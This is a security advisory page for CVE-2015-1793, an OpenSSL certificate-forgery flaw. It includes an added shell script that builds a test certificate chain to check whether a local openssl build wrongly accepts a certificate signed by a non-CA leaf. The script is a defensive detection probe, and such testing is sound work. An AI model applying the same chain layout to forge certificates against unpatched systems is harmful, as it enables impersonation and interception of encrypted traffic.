CVE-2015-1793

Severity: 64%

Complexity: 99%

Confidentiality: 81%

The X509_verify_cert function in crypto/x509/x509_vfy.c in OpenSSL 1.0.1n, 1.0.1o, 1.0.2b, and 1.0.2c does not properly process X.509 Basic Constraints cA values during identification of alternative certificate chains, which allows remote attackers to spoof a Certification Authority role and trigger unintended certificate verifications via a valid leaf certificate.

Background: starting with 1.0.1n and 1.0.2b, when the chain built from the peer-supplied (untrusted) certificates cannot be extended to a trust anchor, X509_verify_cert retries by looking for a trusted certificate that issued one of the certificates lower in that chain and rebuilding from there. The affected releases mis-tracked how many certificates of the rebuilt chain were still untrusted, so the per-certificate extension checks, including the Basic Constraints cA check, were skipped for a certificate the peer had supplied. Given a chain layout that makes the verifier take the alternative-chain path (for example an intermediate that exists both as a cross-signed certificate and as a self-signed trusted one), the holder of any valid end-entity certificate (cA=FALSE) can sign a further certificate with its key and have a vulnerable verifier accept it. Only the four releases above are affected: 1.0.1n/1.0.1o users should upgrade to 1.0.1p, 1.0.2b/1.0.2c users to 1.0.2d; 1.0.0 and 0.9.8 do not contain the alternative-chain logic. Any application that verifies certificates is exposed, which means TLS/DTLS clients first of all, but also servers that perform client-certificate authentication.
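The following script is an added example, not part of this page or of the OpenSSL project. It reproduces, with the openssl command line and freshly generated keys under made-up names, the certificate topology OpenSSL's own regression test for this bug (test/verify_extra) uses, then asks the installed `openssl verify` whether a certificate signed by a CA:FALSE leaf validates. The function and file names are the example's own. A fixed build prints "invalid CA certificate" for the leaf at depth 1; a vulnerable 1.0.1n/o or 1.0.2b/c build prints "bad.pem: OK". The verdict is taken from the output text rather than the exit status because `openssl verify` in the 1.0.x series prints the error line, then "OK", and exits 0 even when the chain is bad.

```shell
#!/bin/sh
# Added probe for CVE-2015-1793 (not part of this page or of OpenSSL itself).
# It rebuilds, with fresh keys and made-up names, the topology that OpenSSL's
# regression test for this bug (test/verify_extra) uses:
#
#   rootCA (self-signed, NOT in the trust store)
#     |
#   interCA (trusted)
#     |
#   subinterCA (untrusted)   subinterCA-ss (trusted; same key and subject, self-signed)
#     |_________________________/
#   leaf, CA:FALSE (untrusted)
#     |
#   bad, CA:FALSE            <- the certificate being verified
#
# The first chain (bad -> leaf -> subinterCA -> interCA) dead-ends because rootCA
# is unknown, so X509_verify_cert looks for an alternative chain and finds
# subinterCA-ss. A vulnerable build miscounts the untrusted certificates while
# doing so and never checks leaf's CA flag, so bad verifies; a fixed build
# reports "invalid CA certificate" (X509_V_ERR_INVALID_CA) at depth 1.
set -eu

W=""   # scratch directory, set by probe_cve_2015_1793

# Generate a P-256 key into $1; EC keeps the probe fast and the bug is key-type independent.
gen_key() { openssl ecparam -name prime256v1 -genkey -noout -out "$1" 2>/dev/null; }

# Minimal req(1) config: an empty DN section (we always pass -subj) plus a CA extension section.
write_cfg() {
  cat > "$1" <<'EOF'
[ req ]
distinguished_name = dn
[ dn ]
[ ca_ext ]
basicConstraints = critical, CA:TRUE
EOF
}

# self_signed NAME [SUFFIX]: self-signed CA:TRUE certificate for $W/NAME.key -> $W/NAME{SUFFIX}.pem
self_signed() {
  openssl req -x509 -new -key "$W/$1.key" -subj "/CN=$1" -days 30 -sha256 \
    -config "$W/req.cnf" -extensions ca_ext -out "$W/$1${2:-}.pem" 2>/dev/null
}

# issue NAME ISSUER CA_FLAG SERIAL: new key + certificate for NAME signed by $W/ISSUER.{pem,key}.
# `openssl x509 -req` does not care whether ISSUER is itself a CA: rejecting that is the
# verifier's job, which is exactly what this probe exercises.
issue() {
  gen_key "$W/$1.key"
  openssl req -new -key "$W/$1.key" -subj "/CN=$1" -config "$W/req.cnf" \
    -out "$W/$1.csr" 2>/dev/null
  printf 'basicConstraints = critical, CA:%s\n' "$3" > "$W/$1.ext"
  openssl x509 -req -in "$W/$1.csr" -CA "$W/$2.pem" -CAkey "$W/$2.key" -set_serial "$4" \
    -days 30 -sha256 -extfile "$W/$1.ext" -out "$W/$1.pem" 2>/dev/null
}

# Build the topology and verify "bad". Prints one verdict line and returns
# 0 = rejected (fixed), 1 = accepted (vulnerable), 2 = some other outcome.
probe_cve_2015_1793() {
  W=$(mktemp -d)
  write_cfg "$W/req.cnf"
  gen_key "$W/rootCA.key"
  self_signed rootCA
  issue interCA    rootCA     TRUE  1
  issue subinterCA interCA    TRUE  2
  self_signed subinterCA -ss             # same key and subject as subinterCA, self-signed
  issue leaf       subinterCA FALSE 3
  issue bad        leaf       FALSE 4    # signed by a CA:FALSE certificate: must never verify
  cat "$W/interCA.pem" "$W/subinterCA-ss.pem" > "$W/roots.pem"
  cat "$W/leaf.pem"    "$W/subinterCA.pem"    > "$W/untrusted.pem"

  # Decide on the text, not the exit status: `openssl verify` in 1.0.x prints
  # the error line, then "OK", and exits 0 even when the chain is bad.
  out=$(openssl verify -CAfile "$W/roots.pem" -untrusted "$W/untrusted.pem" "$W/bad.pem" 2>&1 || true)
  rm -rf "$W"
  case "$out" in
    *"invalid CA certificate"*) echo "rejected: CA flag on leaf enforced"; return 0 ;;
    *"bad.pem: OK"*)            echo "ACCEPTED: this openssl is vulnerable to CVE-2015-1793"; return 1 ;;
    *)                          echo "unexpected result: $out"; return 2 ;;
  esac
}

probe_cve_2015_1793
```

Run it against the `openssl` binary on PATH (or prefix PATH with the build you want to test); a return status of 1 means the build accepted a certificate issued by a non-CA. A non-zero status of 2 with another error text usually means the chain failed for an unrelated reason (for example a clock far off the 30-day validity window) and says nothing about the bug.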

CVSS 3.0 Base Score 6.5. CVSS Attack Vector: network. CVSS Attack Complexity: low. CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N).

CVSS 2.0 Base Score 6.4. CVSS Attack Vector: network. CVSS Attack Complexity: low. CVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:N).

Overview

First reported: 2015-07-09 19:17:00

Last updated: 2018-11-30 21:30:00

Affected Software

Oracle Supply Chain Products Suite 6.1.2.2

Oracle Supply Chain Products Suite 6.1.3.0

Oracle Supply Chain Products Suite 6.2.0

Oracle JD Edwards EnterpriseOne Tools 9.1

Oracle JD Edwards EnterpriseOne Tools 9.2

OpenSSL Project OpenSSL 1.0.1n

OpenSSL Project OpenSSL 1.0.1o

OpenSSL Project OpenSSL 1.0.2b

OpenSSL Project OpenSSL 1.0.2c

References

http://fortiguard.com/advisory/2015-07-09-cve-2015-1793-openssl-alternative-chains-certificate-forgery

NetBSD-SA2015-008

http://kb.juniper.net/InfoCenter/index?page=content&id=JSA10694

FEDORA-2015-11414

FEDORA-2015-11475

SSRT102180

HPSBGN03424

http://openssl.org/news/secadv_20150709.txt (Vendor Advisory)

20150710 OpenSSL Alternative Chains Certificate Forgery Vulnerability (July 2015) Affecting Cisco Products

http://www.fortiguard.com/advisory/2015-07-09-cve-2015-1793-openssl-alternative-chains-certificate-forgery

http://www.oracle.com/technetwork/security-advisory/cpuapr2016v3-2985753.html (Patch)

http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html

http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html

http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html

http://www.oracle.com/technetwork/topics/security/bulletinjul2015-2511963.html

http://www.oracle.com/technetwork/topics/security/cpujan2016-2367955.html (Patch)

http://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html (Patch)

75652

91787

1032817

SSA:2015-190-01

http://www1.huawei.com/en/security/psirt/security-bulletins/security-advisories/hw-454058.htm

https://git.openssl.org/?p=openssl.git;a=commit;h=9a0db453ba017ebcaccbee933ee6511a9ae4d1c8 (Vendor Advisory)

https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04822825

https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c05045763

https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c05184351

https://help.ecostruxureit.com/display/public/UADCO8x/StruxureWare+Data+Center+Operation+Software+Vulnerability+Fixes

https://kc.mcafee.com/corporate/index?page=content&id=SB10125

GLSA-201507-15

38640

FreeBSD-SA-15:12
